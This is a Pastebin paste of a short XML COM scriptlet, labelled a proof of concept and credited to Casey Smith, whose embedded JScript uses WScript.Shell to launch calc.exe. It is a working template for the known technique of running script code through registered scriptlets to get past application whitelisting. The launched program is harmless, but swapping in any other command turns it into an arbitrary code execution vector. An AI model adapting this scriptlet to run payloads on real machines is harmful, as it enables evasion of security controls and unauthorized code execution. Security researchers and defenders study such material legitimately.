Advertisement
Guest User

Untitled

a guest
Jan 22nd, 2020
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.36 KB | None | 0 0
  1. <?XML version="1.0"?>
  2. <scriptlet>
  3. <registration
  4. progid="PoC"
  5. classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
  6. <!-- Proof Of Concept - Casey Smith @subTee -->
  7. <!-- License: BSD3-Clause -->
  8. <script language="JScript">
  9. <![CDATA[
  10. var foo = new ActiveXObject("WScript.Shell").Run("calc.exe");
  11. ]]>
  12. </script>
  13. </registration>
  14. </scriptlet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement